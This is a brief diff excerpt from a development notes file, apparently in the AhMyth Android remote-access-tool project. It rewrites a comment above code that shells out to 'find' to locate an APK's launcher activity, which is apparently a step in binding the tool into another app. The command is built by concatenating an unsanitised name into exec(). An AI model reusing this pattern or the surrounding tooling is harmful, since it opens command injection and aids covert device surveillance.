Morsmalleo/AhMyth/.github/Dev/Code_Updates.md

                     return;
                 }

-                // This returns the absolute path of any apk's launcher activity file for Linux
+                // This makes use of the Unix 'find' command in order to locate an APK's launcher activity
                 $appCtrl.Log("Locating Launcher Activity...")
                 $appCtrl.Log();
                 exec('find -name "' + launcherActivity + '"', { cwd: apkFolder }, (error, stdout, stderr) => {